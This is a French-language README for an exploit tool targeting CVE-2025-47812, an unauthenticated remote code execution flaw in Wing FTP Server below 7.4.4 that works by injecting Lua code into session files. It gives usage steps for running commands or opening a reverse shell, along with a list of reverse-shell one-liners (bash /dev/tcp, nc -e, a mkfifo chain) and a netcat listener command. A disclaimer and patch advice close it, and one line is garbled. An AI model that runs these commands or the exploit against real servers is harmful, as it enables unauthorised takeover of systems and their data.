
Exploit d'exécution de code à distance non authentifiée pour Wing FTP Server < 7.4.4, permettant l'exécution de commandes et des shells inversés via une injection Lua dans les fichiers de session.
CVE-2025-47812 - Exécution de code à distance (RCE) sur Wing FTP Server
===========================================================
Auteur : blindma1den
Date : juillet 2025
Type d'exploit : Exécution de code à distance (non authentifiée)
Cible : Wing FTP Server < 7.4.4
Score CVSS : 10,0 (Critique)
Ce script exploite CVE-2025-47812, une vulnérabilité critique de l'interface web de Wing FTP Server qui permet à des attaquants distants d'exécuter des commandes système arbitraires ou d'ouvrir un reverse shell sans authentification.
La faille est causée par une gestion inappropriée des octets nuls (%00)
dans le formulaire de connexion (/loginok.html). Cela permet
l'injection de code Lua dans les fichiers de session, qui sont ensuite
évalués lors de l'accès à des points d'entrée comme /dir.html.
Description NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, )uname -aInstaller les dépendances :
pip install requests
Exécutez le script :
python3 wingftp_rce_exploit.py
Les invites suivantes vous seront proposées :
[1] EXÉCUTER UNE COMMANDE :
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] REVERSE SHELL :
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
Démarrez votre listener avant de déclencher le shell :
nc -lvnp 4444
Bash : bash -i >& /dev/tcp/IP/PORT 0>&1
Python3 : python3 -c 'import socket,subprocess,os; ...'
Netcat : nc IP PORT -e /bin/sh
PHP : php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat : rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Ce code est fourni à des fins éducatives uniquement. N'utilisez PAS cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous ne disposez pas d'une autorisation explicite de test. Toute utilisation non autorisée est illégale et contraire à l'éthique.
Corrigez vos systèmes immédiatement. Wing FTP Server 7.4.4 résout cette vulnérabilité.
Bon hacking !